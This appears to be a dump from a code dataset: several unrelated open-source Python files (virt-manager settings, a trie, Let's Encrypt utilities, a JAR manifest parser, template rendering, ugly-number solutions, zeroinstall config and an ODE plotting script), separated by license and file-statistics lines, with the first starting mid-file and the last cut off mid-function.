_parse_key(self, key): value = key.strip("/") settingskey = "" if "/" in value: settingskey, value = value.rsplit("/", 1) return settingskey, value def make_vm_settings(self, key): settingskey = self._parse_key(key)[0] if settingskey in self._settingsmap: return True schema = self._root + ".vm" path = "/" + self._root.replace(".", "/") + key.rsplit("/", 1)[0] + "/" self._settingsmap[settingskey] = Gio.Settings.new_with_path(schema, path) return True def _find_settings(self, key): settingskey, value = self._parse_key(key) return self._settingsmap[settingskey], value def _cmd_helper(self, cmd, key, *args, **kwargs): settings, key = self._find_settings(key) return getattr(settings, cmd)(key, *args, **kwargs) def notify_add(self, key, cb, *args, **kwargs): settings, key = self._find_settings(key) def wrapcb(*ignore): return cb(*args, **kwargs) ret = settings.connect("changed::%s" % key, wrapcb, *args, **kwargs) self._handler_map[ret] = settings return ret def notify_remove(self, h): settings = self._handler_map.pop(h) return settings.disconnect(h) def get(self, key): return self._cmd_helper("get_value", key).unpack() def set(self, key, value, *args, **kwargs): fmt = self._cmd_helper("get_value", key).get_type_string() return self._cmd_helper("set_value", key, GLib.Variant(fmt, value), *args, **kwargs) class vmmConfig(object): # key names for saving last used paths CONFIG_DIR_IMAGE = "image" CONFIG_DIR_ISO_MEDIA = "isomedia" CONFIG_DIR_FLOPPY_MEDIA = "floppymedia" CONFIG_DIR_SAVE = "save" CONFIG_DIR_RESTORE = "restore" CONFIG_DIR_SCREENSHOT = "screenshot" CONFIG_DIR_FS = "fs" # Metadata mapping for browse types. Prob shouldn't go here, but works # for now. browse_reason_data = { CONFIG_DIR_IMAGE : { "enable_create" : True, "storage_title" : _("Locate or create storage volume"), "local_title" : _("Locate existing storage"), "dialog_type" : Gtk.FileChooserAction.SAVE, "choose_button" : Gtk.STOCK_OPEN, }, CONFIG_DIR_ISO_MEDIA : { "enable_create" : False, "storage_title" : _("Locate ISO media volume"), "local_title" : _("Locate ISO media"), }, CONFIG_DIR_FLOPPY_MEDIA : { "enable_create" : False, "storage_title" : _("Locate floppy media volume"), "local_title" : _("Locate floppy media"), }, CONFIG_DIR_FS : { "enable_create" : False, "storage_title" : _("Locate directory volume"), "local_title" : _("Locate directory volume"), "dialog_type" : Gtk.FileChooserAction.SELECT_FOLDER, }, } CONSOLE_SCALE_NEVER = 0 CONSOLE_SCALE_FULLSCREEN = 1 CONSOLE_SCALE_ALWAYS = 2 DEFAULT_XEN_IMAGE_DIR = "/var/lib/xen/images" DEFAULT_XEN_SAVE_DIR = "/var/lib/xen/dump" DEFAULT_VIRT_IMAGE_DIR = "/var/lib/libvirt/images" DEFAULT_VIRT_SAVE_DIR = "/var/lib/libvirt" def __init__(self, appname, cliconfig, test_first_run=False): self.appname = appname self.appversion = cliconfig.__version__ self.conf_dir = "/org/virt-manager/%s/" % self.appname self.ui_dir = os.path.join(cliconfig.asset_dir, "ui") self.test_first_run = bool(test_first_run) self.conf = SettingsWrapper("org.virt-manager.virt-manager") # We don't create it straight away, since we don't want # to block the app pending user authorization to access # the keyring self.keyring = None self.default_qemu_user = cliconfig.default_qemu_user self.stable_defaults = cliconfig.stable_defaults self.preferred_distros = cliconfig.preferred_distros self.hv_packages = cliconfig.hv_packages self.libvirt_packages = cliconfig.libvirt_packages self.askpass_package = cliconfig.askpass_package self.default_graphics_from_config = cliconfig.default_graphics self.with_bhyve = cliconfig.with_bhyve self.cli_usbredir = None self.default_storage_format_from_config = "qcow2" self.cpu_default_from_config = "host-cpu-model" self.default_console_resizeguest = 0 self.default_add_spice_usbredir = "yes" self._objects = [] self.support_inspection = self.check_inspection() self._spice_error = None global running_config running_config = self def check_inspection(self): try: # Check we can open the Python guestfs module. from guestfs import GuestFS # pylint: disable=import-error GuestFS(close_on_exit=False) return True except: return False # General app wide helpers (gsettings agnostic) def get_appname(self): return self.appname def get_appversion(self): return self.appversion def get_ui_dir(self): return self.ui_dir def embeddable_graphics(self): ret = ["vnc", "spice"] return ret def remove_notifier(self, h): self.conf.notify_remove(h) # Used for debugging reference leaks, we keep track of all objects # come and go so we can do a leak report at app shutdown def add_object(self, obj): self._objects.append(obj) def remove_object(self, obj): self._objects.remove(obj) def get_objects(self): return self._objects[:] def _make_pervm_key(self, uuid, key): return "/vms/%s%s" % (uuid.replace("-", ""), key) def listen_pervm(self, uuid, key, *args, **kwargs): key = self._make_pervm_key(uuid, key) self.conf.make_vm_settings(key) return self.conf.notify_add(key, *args, **kwargs) def set_pervm(self, uuid, key, *args, **kwargs): key = self._make_pervm_key(uuid, key) self.conf.make_vm_settings(key) ret = self.conf.set(key, *args, **kwargs) return ret def get_pervm(self, uuid, key): key = self._make_pervm_key(uuid, key) self.conf.make_vm_settings(key) return self.conf.get(key) ################### # General helpers # ################### # Manager stats view preferences def is_vmlist_guest_cpu_usage_visible(self): return self.conf.get("/vmlist-fields/cpu-usage") def is_vmlist_host_cpu_usage_visible(self): return self.conf.get("/vmlist-fields/host-cpu-usage") def is_vmlist_memory_usage_visible(self): return self.conf.get("/vmlist-fields/memory-usage") def is_vmlist_disk_io_visible(self): return self.conf.get("/vmlist-fields/disk-usage") def is_vmlist_network_traffic_visible(self): return self.conf.get("/vmlist-fields/network-traffic") def set_vmlist_guest_cpu_usage_visible(self, state): self.conf.set("/vmlist-fields/cpu-usage", state) def set_vmlist_host_cpu_usage_visible(self, state): self.conf.set("/vmlist-fields/host-cpu-usage", state) def set_vmlist_memory_usage_visible(self, state): self.conf.set("/vmlist-fields/memory-usage", state) def set_vmlist_disk_io_visible(self, state): self.conf.set("/vmlist-fields/disk-usage", state) def set_vmlist_network_traffic_visible(self, state): self.conf.set("/vmlist-fields/network-traffic", state) def on_vmlist_guest_cpu_usage_visible_changed(self, cb): return self.conf.notify_add("/vmlist-fields/cpu-usage", cb) def on_vmlist_host_cpu_usage_visible_changed(self, cb): return self.conf.notify_add("/vmlist-fields/host-cpu-usage", cb) def on_vmlist_memory_usage_visible_changed(self, cb): return self.conf.notify_add("/vmlist-fields/memory-usage", cb) def on_vmlist_disk_io_visible_changed(self, cb): return self.conf.notify_add("/vmlist-fields/disk-usage", cb) def on_vmlist_network_traffic_visible_changed(self, cb): return self.conf.notify_add("/vmlist-fields/network-traffic", cb) # Keys preferences def get_keys_combination(self): ret = self.conf.get("/console/grab-keys") if not ret: # Left Control + Left Alt return "65507,65513" return ret def set_keys_combination(self, val): # Val have to be a list of integers val = ','.join([str(v) for v in val]) self.conf.set("/console/grab-keys", val) def on_keys_combination_changed(self, cb): return self.conf.notify_add("/console/grab-keys", cb) # This key is not intended to be exposed in the UI yet def get_keyboard_grab_default(self): return self.conf.get("/console/grab-keyboard") def set_keyboard_grab_default(self, val): self.conf.set("/console/grab-keyboard", val) def on_keyboard_grab_default_changed(self, cb): return self.conf.notify_add("/console/grab-keyboard", cb) # Confirmation preferences def get_confirm_forcepoweroff(self): return self.conf.get("/confirm/forcepoweroff") def get_confirm_poweroff(self): return self.conf.get("/confirm/poweroff") def get_confirm_pause(self): return self.conf.get("/confirm/pause") def get_confirm_removedev(self): return self.conf.get("/confirm/removedev") def get_confirm_interface(self): return self.conf.get("/confirm/interface-power") def get_confirm_unapplied(self): return self.conf.get("/confirm/unapplied-dev") def get_confirm_delstorage(self): return self.conf.get("/confirm/delete-storage") def set_confirm_forcepoweroff(self, val): self.conf.set("/confirm/forcepoweroff", val) def set_confirm_poweroff(self, val): self.conf.set("/confirm/poweroff", val) def set_confirm_pause(self, val): self.conf.set("/confirm/pause", val) def set_confirm_removedev(self, val): self.conf.set("/confirm/removedev", val) def set_confirm_interface(self, val): self.conf.set("/confirm/interface-power", val) def set_confirm_unapplied(self, val): self.conf.set("/confirm/unapplied-dev", val) def set_confirm_delstorage(self, val): self.conf.set("/confirm/delete-storage", val) # System tray visibility def on_view_system_tray_changed(self, cb): return self.conf.notify_add("/system-tray", cb) def get_view_system_tray(self): return self.conf.get("/system-tray") def set_view_system_tray(self, val): self.conf.set("/system-tray", val) # Stats history and interval length def get_stats_history_length(self): return 120 def get_stats_update_interval(self): interval = self.conf.get("/stats/update-interval") if interval < 1: return 1 return interval def set_stats_update_interval(self, interval): self.conf.set("/stats/update-interval", interval) def on_stats_update_interval_changed(self, cb): return self.conf.notify_add("/stats/update-interval", cb) # Disable/Enable different stats polling def get_stats_enable_cpu_poll(self): return self.conf.get("/stats/enable-cpu-poll") def get_stats_enable_disk_poll(self): return self.conf.get("/stats/enable-disk-poll") def get_stats_enable_net_poll(self): return self.conf.get("/stats/enable-net-poll") def get_stats_enable_memory_poll(self): return self.conf.get("/stats/enable-memory-poll") def set_stats_enable_cpu_poll(self, val): self.conf.set("/stats/enable-cpu-poll", val) def set_stats_enable_disk_poll(self, val): self.conf.set("/stats/enable-disk-poll", val) def set_stats_enable_net_poll(self, val): self.conf.set("/stats/enable-net-poll", val) def set_stats_enable_memory_poll(self, val): self.conf.set("/stats/enable-memory-poll", val) def on_stats_enable_cpu_poll_changed(self, cb, row=None): return self.conf.notify_add("/stats/enable-cpu-poll", cb, row) def on_stats_enable_disk_poll_changed(self, cb, row=None): return self.conf.notify_add("/stats/enable-disk-poll", cb, row) def on_stats_enable_net_poll_changed(self, cb, row=None): return self.conf.notify_add("/stats/enable-net-poll", cb, row) def on_stats_enable_memory_poll_changed(self, cb, row=None): return self.conf.notify_add("/stats/enable-memory-poll", cb, row) # VM Console preferences def on_console_accels_changed(self, cb): return self.conf.notify_add("/console/enable-accels", cb) def get_console_accels(self): console_pref = self.conf.get("/console/enable-accels") if console_pref is None: console_pref = False return console_pref def set_console_accels(self, pref): self.conf.set("/console/enable-accels", pref) def on_console_scaling_changed(self, cb): return self.conf.notify_add("/console/scaling", cb) def get_console_scaling(self): return self.conf.get("/console/scaling") def set_console_scaling(self, pref): self.conf.set("/console/scaling", pref) def on_console_resizeguest_changed(self, cb): return self.conf.notify_add("/console/resize-guest", cb) def get_console_resizeguest(self): val = self.conf.get("/console/resize-guest") if val == -1: val = self.default_console_resizeguest return val def set_console_resizeguest(self, pref): self.conf.set("/console/resize-guest", pref) def get_auto_redirection(self): if self.cli_usbredir is not None: return self.cli_usbredir return self.conf.get("/console/auto-redirect") def set_auto_redirection(self, state): self.conf.set("/console/auto-redirect", state) # Show VM details toolbar def get_details_show_toolbar(self): res = self.conf.get("/details/show-toolbar") if res is None: res = True return res def set_details_show_toolbar(self, state): self.conf.set("/details/show-toolbar", state) # VM details default size def get_details_window_size(self): w = self.conf.get("/details/window_width") h = self.conf.get("/details/window_height") return (w, h) def set_details_window_size(self, w, h): self.conf.set("/details/window_width", w) self.conf.set("/details/window_height", h) # New VM preferences def get_new_vm_sound(self): return self.conf.get("/new-vm/add-sound") def set_new_vm_sound(self, state): self.conf.set("/new-vm/add-sound", state) def get_graphics_type(self, raw=False): ret = self.conf.get("/new-vm/graphics-type") if ret not in ["system", "vnc", "spice"]: ret = "system" if ret == "system" and not raw: return self.default_graphics_from_config return ret def set_graphics_type(self, gtype): self.conf.set("/new-vm/graphics-type", gtype.lower()) def get_add_spice_usbredir(self, raw=False): ret = self.conf.get("/new-vm/add-spice-usbredir") if ret not in ["system", "yes", "no"]: ret = "system" if not raw and not self.get_graphics_type() == "spice": return "no" if ret == "system" and not raw: return self.default_add_spice_usbredir return ret def set_add_spice_usbredir(self, val): self.conf.set("/new-vm/add-spice-usbredir", val) def get_default_storage_format(self, raw=False): ret = self.conf.get("/new-vm/storage-format") if ret not in ["default", "raw", "qcow2"]: ret = "default" if ret == "default" and not raw: return self.default_storage_format_from_config return ret def set_storage_format(self, typ): self.conf.set("/new-vm/storage-format", typ.lower()) def get_default_cpu_setting(self, raw=False, for_cpu=False): ret = self.conf.get("/new-vm/cpu-default") whitelist = [CPU.SPECIAL_MODE_HOST_MODEL_ONLY, CPU.SPECIAL_MODE_HOST_MODEL, CPU.SPECIAL_MODE_HV_DEFAULT] if ret not in whitelist: ret = "default" if ret == "default" and not raw: ret = self.cpu_default_from_config if ret not in whitelist: ret = whitelist[0] if for_cpu and ret == CPU.SPECIAL_MODE_HOST_MODEL: # host-model has known issues, so use our 'copy cpu' # behavior until host-model does what we need ret = CPU.SPECIAL_MODE_HOST_COPY return ret def set_default_cpu_setting(self, val): self.conf.set("/new-vm/cpu-default", val.lower()) # URL/Media path history def _url_add_helper(self, gsettings_path, url): maxlength = 10 urls = self.conf.get(gsettings_path) if urls is None: urls = [] if urls.count(url) == 0 and len(url) > 0 and not url.isspace(): # The url isn't already in the list, so add it urls.insert(0, url) if len(urls) > maxlength: del urls[len(urls) - 1] self.conf.set(gsettings_path, urls) def add_media_url(self, url): self._url_add_helper("/urls/urls", url) def add_kickstart_url(self, url): self._url_add_helper("/urls/kickstarts", url) def add_iso_path(self, path): self._url_add_helper("/urls/isos", path) def get_media_urls(self): return self.conf.get("/urls/urls") def get_kickstart_urls(self): return self.conf.get("/urls/kickstarts") def get_iso_paths(self): return self.conf.get("/urls/isos") # Whether to ask about fixing path permissions def add_perms_fix_ignore(self, pathlist): current_list = self.get_perms_fix_ignore() or [] for path in pathlist: if path in current_list: continue current_list.append(path) self.conf.set("/paths/perms-fix-ignore", current_list) def get_perms_fix_ignore(self): return self.conf.get("/paths/perms-fix-ignore") # Manager view connection list def add_conn(self, uri): if self.test_first_run: return uris = self.conf.get("/connections/uris") if uris is None: uris = [] if uris.count(uri) == 0: uris.insert(len(uris) - 1, uri) self.conf.set("/connections/uris", uris) def remove_conn(self, uri): uris = self.conf.get("/connections/uris") if uris is None: return if uris.count(uri) != 0: uris.remove(uri) self.conf.set("/connections/uris", uris) if self.get_conn_autoconnect(uri): uris = self.conf.get("/connections/autoconnect") uris.remove(uri) self.conf.set("/connections/autoconnect", uris) def get_conn_uris(self): if self.test_first_run: return [] return self.conf.get("/connections/uris") # Manager default window size def get_manager_window_size(self): w = self.conf.get("/manager-window-width") h = self.conf.get("/manager-window-height") return (w, h) def set_manager_window_size(self, w, h): self.conf.set("/manager-window-width", w) self.conf.set("/manager-window-height", h) # URI autoconnect def get_conn_autoconnect(self, uri): uris = self.conf.get("/connections/autoconnect") return ((uris is not None) and (uri in uris)) def set_conn_autoconnect(self, uri, val): if self.test_first_run: return uris = self.conf.get("/connections/autoconnect") if uris is None: uris = [] if not val and uri in uris: uris.remove(uri) elif val and uri not in uris: uris.append(uri) self.conf.set("/connections/autoconnect", uris) # Default directory location dealings def _get_default_dir_key(self, _type): if (_type in [self.CONFIG_DIR_ISO_MEDIA, self.CONFIG_DIR_FLOPPY_MEDIA]): return "media" if (_type in [self.CONFIG_DIR_IMAGE, self.CONFIG_DIR_SCREENSHOT]): return _type return None def get_default_directory(self, conn, _type): key = self._get_default_dir_key(_type) path = None if key: path = self.conf.get("/paths/%s-default" % key) if not path: if (_type == self.CONFIG_DIR_IMAGE or _type == self.CONFIG_DIR_ISO_MEDIA or _type == self.CONFIG_DIR_FLOPPY_MEDIA): path = self.get_default_image_dir(conn) if (_type == self.CONFIG_DIR_SAVE or _type == self.CONFIG_DIR_RESTORE): path = self.get_default_save_dir(conn) logging.debug("directory for type=%s returning=%s", _type, path) return path def set_default_directory(self, folder, _type): key = self._get_default_dir_key(_type) if not key: return logging.debug("saving directory for type=%s to %s", key, folder) self.conf.set("/paths/%s-default" % key, folder) def get_default_image_dir(self, conn): if conn.is_xen(): return self.DEFAULT_XEN_IMAGE_DIR if (conn.is_qemu_session() or not os.access(self.DEFAULT_VIRT_IMAGE_DIR, os.W_OK)): return os.getcwd() # Just return the default dir since the intention is that it # is a managed pool and the user will be able to install to it. return self.DEFAULT_VIRT_IMAGE_DIR def get_default_save_dir(self, conn): if conn.is_xen(): return self.DEFAULT_XEN_SAVE_DIR elif os.access(self.DEFAULT_VIRT_SAVE_DIR, os.W_OK): return self.DEFAULT_VIRT_SAVE_DIR else: return os.getcwd() # Keyring / VNC password dealings def get_secret_name(self, vm): return "vm-console-" + vm.get_uuid() def has_keyring(self): if self.keyring is None: self.keyring = vmmKeyring() return self.keyring.is_available() def get_console_password(self, vm): if not self.has_keyring(): return ("", "") username, keyid = vm.get_console_password() if keyid == -1: return ("", "") secret = self.keyring.get_secret(keyid) if secret is None or secret.get_name() != self.get_secret_name(vm): return ("", "") if (secret.attributes.get("hvuri", None) != vm.conn.get_uri() or secret.attributes.get("uuid", None) != vm.get_uuid()): return ("", "") return (secret.get_secret(), username or "") def set_console_password(self, vm, password, username=""): if not self.has_keyring(): return secret = vmmSecret(self.get_secret_name(vm), password, {"uuid" : vm.get_uuid(), "hvuri": vm.conn.get_uri()}) keyid = self.keyring.add_secret(secret) if keyid is None: return vm.set_console_password(username, keyid)
gpl-2.0
-5,542,892,643,271,892,000
35.148415
79
0.604775
false
3.603936
true
false
false
armsky/Algorithms
Data Structure/trie.py
1
1534
class TrieNode: # Initialize your data structure here. def __init__(self): self.children = {} self.is_word = False class Trie: def __init__(self): self.root = TrieNode() # @param {string} word # @return {void} # Inserts a word into the trie. def insert(self, word): if word: node = self.root for char in word: child = node.children.get(char) if not child: child = TrieNode() node.children[char] = child node = child node.is_word = True # @param {string} word # @return {boolean} # Returns if the word is in the trie. def search(self, word): if word: node = self.root for char in word: if char not in node.children: return False node = node.children[char] return node.is_word else: return False # @param {string} prefix # @return {boolean} # Returns if there is any word in the trie # that starts with the given prefix. def startsWith(self, prefix): if prefix: node = self.root for char in prefix: if char not in node.children: return False node = node.children[char] return True return False trie = Trie() trie.insert("a") trie.insert("ab") print trie.search("a") print trie.search("ab")
apache-2.0
-8,049,908,019,752,421,000
25.448276
47
0.508475
false
4.191257
false
false
false
felixrieseberg/lets-encrypt-preview
letsencrypt/le_util.py
1
2392
"""Utilities for all Let's Encrypt.""" import collections import errno import os import stat from letsencrypt import errors Key = collections.namedtuple("Key", "file pem") # Note: form is the type of data, "pem" or "der" CSR = collections.namedtuple("CSR", "file data form") def make_or_verify_dir(directory, mode=0o755, uid=0): """Make sure directory exists with proper permissions. :param str directory: Path to a directory. :param int mode: Directory mode. :param int uid: Directory owner. :raises LetsEncryptClientError: if a directory already exists, but has wrong permissions or owner :raises OSError: if invalid or inaccessible file names and paths, or other arguments that have the correct type, but are not accepted by the operating system. """ try: os.makedirs(directory, mode) except OSError as exception: if exception.errno == errno.EEXIST: if not check_permissions(directory, mode, uid): raise errors.LetsEncryptClientError( "%s exists, but does not have the proper " "permissions or owner" % directory) else: raise def check_permissions(filepath, mode, uid=0): """Check file or directory permissions. :param str filepath: Path to the tested file (or directory). :param int mode: Expected file mode. :param int uid: Expected file owner. :returns: True if `mode` and `uid` match, False otherwise. :rtype: bool """ file_stat = os.stat(filepath) return stat.S_IMODE(file_stat.st_mode) == mode and file_stat.st_uid == uid def unique_file(path, mode=0o777): """Safely finds a unique file for writing only (by default). :param str path: path/filename.ext :param int mode: File mode :return: tuple of file object and file name """ path, tail = os.path.split(path) count = 0 while True: fname = os.path.join(path, "%04d_%s" % (count, tail)) try: file_d = os.open(fname, os.O_CREAT | os.O_EXCL | os.O_RDWR, mode) return os.fdopen(file_d, "w"), fname except OSError: pass count += 1 def safely_remove(path): """Remove a file that may not exist.""" try: os.remove(path) except OSError as err: if err.errno != errno.ENOENT: raise
apache-2.0
6,374,653,857,685,918,000
27.47619
78
0.629599
false
3.921311
false
false
false
salimfadhley/jenkinsapi
jenkinsapi/utils/manifest.py
3
3306
""" This module enables Manifest file parsing. Copied from https://chromium.googlesource.com/external/googleappengine/python/+/master /google/appengine/tools/jarfile.py """ import zipfile _MANIFEST_NAME = 'META-INF/MANIFEST.MF' class InvalidJarError(Exception): """ InvalidJar exception class """ pass class Manifest(object): """The parsed manifest from a jar file. Attributes: main_section: a dict representing the main (first) section of the manifest. Each key is a string that is an attribute, such as 'Manifest-Version', and the corresponding value is a string that is the value of the attribute, such as '1.0'. sections: a dict representing the other sections of the manifest. Each key is a string that is the value of the 'Name' attribute for the section, and the corresponding value is a dict like the main_section one, for the other attributes. """ def __init__(self, main_section, sections): self.main_section = main_section self.sections = sections def read_manifest(jar_file_name): """Read and parse the manifest out of the given jar. Args: jar_file_name: the name of the jar from which the manifest is to be read. Returns: A parsed Manifest object, or None if the jar has no manifest. Raises: IOError: if the jar does not exist or cannot be read. """ with zipfile.ZipFile(jar_file_name) as jar: try: manifest_string = jar.read(_MANIFEST_NAME).decode('UTF-8') except KeyError: return None return _parse_manifest(manifest_string) def _parse_manifest(manifest_string): """Parse a Manifest object out of the given string. Args: manifest_string: a str or unicode that is the manifest contents. Returns: A Manifest object parsed out of the string. Raises: InvalidJarError: if the manifest is not well-formed. """ manifest_string = '\n'.join(manifest_string.splitlines()).rstrip('\n') section_strings = manifest_string.split('\n\n') parsed_sections = [_parse_manifest_section(s) for s in section_strings] main_section = parsed_sections[0] sections = dict() try: for entry in parsed_sections[1:]: sections[entry['Name']] = entry except KeyError: raise InvalidJarError( 'Manifest entry has no Name attribute: %s' % entry) return Manifest(main_section, sections) def _parse_manifest_section(section): """Parse a dict out of the given manifest section string. Args: section: a str or unicode that is the manifest section. It looks something like this (without the >): > Name: section-name > Some-Attribute: some value > Another-Attribute: another value Returns: A dict where the keys are the attributes (here, 'Name', 'Some-Attribute', 'Another-Attribute'), and the values are the corresponding attribute values. Raises: InvalidJarError: if the manifest section is not well-formed. """ section = section.replace('\n ', '') try: return dict(line.split(': ', 1) for line in section.split('\n')) except ValueError: raise InvalidJarError('Invalid manifest %r' % section)
mit
-2,833,017,234,510,234,000
33.082474
79
0.659407
false
4.190114
false
false
false
rogerthat-platform/rogerthat-backend
src/rogerthat/templates/__init__.py
1
3596
# -*- coding: utf-8 -*- # Copyright 2017 GIG Technology NV # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # @@license_version:1.3@@ import logging import os from rogerthat import consts from rogerthat.settings import get_server_settings from rogerthat.templates.jinja_extensions import TranslateExtension from rogerthat.translations import DEFAULT_LANGUAGE from google.appengine.ext.webapp import template import jinja2 from mcfw.rpc import returns, arguments TEMPLATES_DIR = os.path.dirname(__file__) _SUPPORTED_LANGUAGES = [d for d in os.listdir(TEMPLATES_DIR) if os.path.isdir(os.path.join(TEMPLATES_DIR, d))] _CONSTS = dict(((name, getattr(consts, name)) for name in dir(consts) if name.upper() == name)) JINJA_ENVIRONMENT = jinja2.Environment(loader=jinja2.FileSystemLoader([os.path.join(os.path.dirname(__file__))]), extensions=[TranslateExtension]) @returns(unicode) @arguments(template_name=str, languages=[str], variables=dict, category=unicode) def render(template_name, languages, variables, category=""): logging.info("Rendering %s for languages %s" % (template_name, languages)) variables = dict(variables) variables.update(_CONSTS) variables["BASE_URL"] = get_server_settings().baseUrl variables["INCLUDE_ROGERTHAT_DOT_NET"] = True if not languages: languages = list() languages.append(DEFAULT_LANGUAGE) logging.debug("Supported languages: %s" % _SUPPORTED_LANGUAGES) for lang in languages: lang = lang.replace('-', '_') file_name = os.path.join(TEMPLATES_DIR, lang, category, "%s.tmpl" % template_name) if lang in _SUPPORTED_LANGUAGES and os.path.exists(file_name): return template.render(file_name, variables) if '_' in lang: lang = lang.split('_')[0] file_name = os.path.join(TEMPLATES_DIR, lang, category, "%s.tmpl" % template_name) if lang in _SUPPORTED_LANGUAGES and os.path.exists(file_name): return template.render(file_name, variables) raise NotImplementedError("Template not found!") @returns([str]) @arguments(header=unicode) def get_languages_from_header(header): if not header: return [DEFAULT_LANGUAGE] try: languages = list() for item in header.split(','): items = item.split(';') lang = items[0] splitted = lang.split('-') if len(splitted) == 2: lang = '%s_%s' % (splitted[0].lower(), splitted[1].upper()) if len(items) == 1: languages.append((lang, 1.0)) else: qualifier = items[1].split("=")[1] languages.append((lang, float(qualifier))) return [str(i[0]) for i in sorted(languages, key=lambda x: x[1], reverse=True)] except: logging.exception("Could not parse language header.") return [DEFAULT_LANGUAGE] @returns([str]) @arguments(request=object) def get_languages_from_request(request): return get_languages_from_header(request.headers.get('Accept-Language', None))
apache-2.0
-4,756,188,799,871,613,000
38.955556
113
0.666574
false
3.866667
false
false
false
shub0/algorithm-data-structure
python/ugly_nums.py
1
1800
''' Write a program to check whether a given number is an ugly number. Ugly numbers are positive numbers whose prime factors only include 2, 3, 5. For example, 6, 8 are ugly while 14 is not ugly since it includes another prime factor 7. Note that 1 is typically treated as an ugly number. ''' class Solution(object): def isUgly(self, num): """ :type num: int :rtype: bool """ if num <= 0: return self.isUgly(-1 * num) while num > 1: if (num % 2 == 0): num /= 2 elif (num % 3 == 0): num /= 3 elif (num % 5 == 0): num /= 5 else: return False return True def nthSuperUglyNumber(self, n, primes): """ :type n: int :type primes: List[int] :rtype: int """ size = len(primes) nums = [1] indices = [0] * size local_num = [0] * size while n > 1: local_num = [ primes[index] * nums[indices[index]] for index in range(size) ] num = min(local_num) for index in range(size): if local_num[index] == num: indices[index] += 1 nums.append(num) n -= 1 return nums[-1] def nthUglyNumber(self, n): """ :type n: int :rtype: int """ nums = [1] i2,i3,i5=0,0,0 while n > 0: u2,u3,u5 = nums[i2]*2, nums[i3]*3, nums[i5]*5 num = min(u2, u3, u5) if num == u2: i2 += 1 if num == u3: i3 += 1 if num == u5: i5 += 1 nums.append(num) n -= 1 return num[-1]
bsd-3-clause
8,164,448,989,103,989,000
26.272727
165
0.436111
false
3.73444
false
false
false
dabrahams/zeroinstall
zeroinstall/injector/config.py
1
4191
""" Holds user settings and various helper objects. """ # Copyright (C) 2011, Thomas Leonard # See the README file for details, or visit http://0install.net. from zeroinstall import _ import os from logging import info, warn import ConfigParser from zeroinstall import zerostore from zeroinstall.injector.model import network_levels, network_full from zeroinstall.injector.namespaces import config_site, config_prog from zeroinstall.support import basedir DEFAULT_FEED_MIRROR = "http://roscidus.com/0mirror" DEFAULT_KEY_LOOKUP_SERVER = 'https://keylookup.appspot.com' class Config(object): """ @ivar auto_approve_keys: whether to approve known keys automatically @type auto_approve_keys: bool @ivar handler: handler for main-loop integration @type handler: L{handler.Handler} @ivar key_info_server: the base URL of a key information server @type key_info_server: str @ivar feed_mirror: the base URL of a mirror site for keys and feeds @type feed_mirror: str | None @ivar freshness: seconds since a feed was last checked before it is considered stale @type freshness: int """ __slots__ = ['help_with_testing', 'freshness', 'network_use', 'feed_mirror', 'key_info_server', 'auto_approve_keys', '_fetcher', '_stores', '_iface_cache', '_handler', '_trust_mgr', '_trust_db'] def __init__(self, handler = None): self.help_with_testing = False self.freshness = 60 * 60 * 24 * 30 self.network_use = network_full self._handler = handler self._fetcher = self._stores = self._iface_cache = self._trust_mgr = self._trust_db = None self.feed_mirror = DEFAULT_FEED_MIRROR self.key_info_server = DEFAULT_KEY_LOOKUP_SERVER self.auto_approve_keys = True @property def stores(self): if not self._stores: self._stores = zerostore.Stores() return self._stores @property def iface_cache(self): if not self._iface_cache: from zeroinstall.injector import iface_cache self._iface_cache = iface_cache.iface_cache #self._iface_cache = iface_cache.IfaceCache() return self._iface_cache @property def fetcher(self): if not self._fetcher: from zeroinstall.injector import fetch self._fetcher = fetch.Fetcher(self) return self._fetcher @property def trust_mgr(self): if not self._trust_mgr: from zeroinstall.injector import trust self._trust_mgr = trust.TrustMgr(self) return self._trust_mgr @property def trust_db(self): from zeroinstall.injector import trust self._trust_db = trust.trust_db @property def handler(self): if not self._handler: from zeroinstall.injector import handler if os.isatty(1): self._handler = handler.ConsoleHandler() else: self._handler = handler.Handler() return self._handler def save_globals(self): """Write global settings.""" parser = ConfigParser.ConfigParser() parser.add_section('global') parser.set('global', 'help_with_testing', self.help_with_testing) parser.set('global', 'network_use', self.network_use) parser.set('global', 'freshness', self.freshness) parser.set('global', 'auto_approve_keys', self.auto_approve_keys) path = basedir.save_config_path(config_site, config_prog) path = os.path.join(path, 'global') parser.write(open(path + '.new', 'w')) os.rename(path + '.new', path) def load_config(handler = None): config = Config(handler) parser = ConfigParser.RawConfigParser() parser.add_section('global') parser.set('global', 'help_with_testing', 'False') parser.set('global', 'freshness', str(60 * 60 * 24 * 30)) # One month parser.set('global', 'network_use', 'full') parser.set('global', 'auto_approve_keys', 'True') path = basedir.load_first_config(config_site, config_prog, 'global') if path: info("Loading configuration from %s", path) try: parser.read(path) except Exception as ex: warn(_("Error loading config: %s"), str(ex) or repr(ex)) config.help_with_testing = parser.getboolean('global', 'help_with_testing') config.network_use = parser.get('global', 'network_use') config.freshness = int(parser.get('global', 'freshness')) config.auto_approve_keys = parser.getboolean('global', 'auto_approve_keys') assert config.network_use in network_levels, config.network_use return config
lgpl-2.1
1,600,320,682,563,970,000
31.238462
117
0.715581
false
3.199237
true
false
false
cjmathy/ode_model
ode_modeler/plot.py
1
3666
import os import numpy as np import matplotlib.pyplot as plt from matplotlib.backends.backend_pdf import PdfPages def plot_all_queries(species, queries, out_dir, out_format, plot_species, ttot, **kwargs): ''' Description: This method creates plots for each species, plotting timecourse curves from all queries on the same plot. Input: species - a dictionary mapping strings to Species objects. queries - a list of query objects. out_dir - the path to the output directory. out_format - the file format for output figures. plot_species - a list containing species names to be plotted. default is to generate plots for all species. ttot - the total length of simulation. ''' if out_format == 'pdf_one': pdf = PdfPages(os.path.join(out_dir + '/all_queries.pdf')) if plot_species[0] is 'all': plot_species = species.keys() for sp in plot_species: fig = plt.figure() for query in queries: plt.plot(query.t, query.concentrations[:, species[sp].index]) plt.title(sp) plt.ylabel('Concentration (uM)') plt.xlabel('Time (seconds)') plt.legend(queries) plt.xticks(np.arange(0, ttot+1, ttot/2)) plt.grid(True) if out_format == 'pdf_mult': pdf = PdfPages( os.path.join(out_dir + '/{}.pdf'.format(sp))) pdf.savefig() pdf.close() if out_format == 'png': 